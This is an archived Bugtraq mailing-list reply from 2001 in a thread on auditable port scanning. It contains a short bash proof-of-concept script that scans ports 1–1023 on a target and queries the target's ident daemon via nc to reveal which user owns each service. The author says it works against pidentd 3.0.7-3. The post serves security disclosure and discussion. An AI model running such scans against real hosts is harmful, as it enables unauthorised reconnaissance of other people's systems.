Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: analysis of auditable port scanning techniques
From: Rainer Weikusat <weikusat () MAIL UNI-MAINZ DE>
Date: Sat, 6 Jan 2001 10:50:31 +0100

Dan Harkless <dan-bugtraq () DILVISH SPEED NET> writes:
Using this grammar applied to the data we send to an arbitrary host piped
to the ident/auth port will reveal the process owner running on a given
port, even though we initiated the connection.

Uh, no.  With properly-written ident daemons, such as pidentd,
-------------
#!/bin/bash
#

if [ "$1" != sub ];
then
    export HOST=$(host $1 | awk '{ print $3; }')
    declare -i I=1
    export PPPID=$$

    while [ $I -lt 1024 ];
    do
        (
            export I
            socket -r -p "$0 sub" $HOST $I 2>/dev/null
         )

        I=$(($I + 1))
    done
else
   LOCAL=$(netstat -n | grep ":.\+$HOST:$I.\+EST"|awk '{print $4;}'| cut -d: -f2)
   echo "$I,$LOCAL" | nc -w 1 $HOST auth >/proc/$PPPID/fd/1
   kill $PPID
fi
-------------

Just hacked up. Works wonderfully against pidentd 3.0.7-3 (Debian).

--
SIGSTOP


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault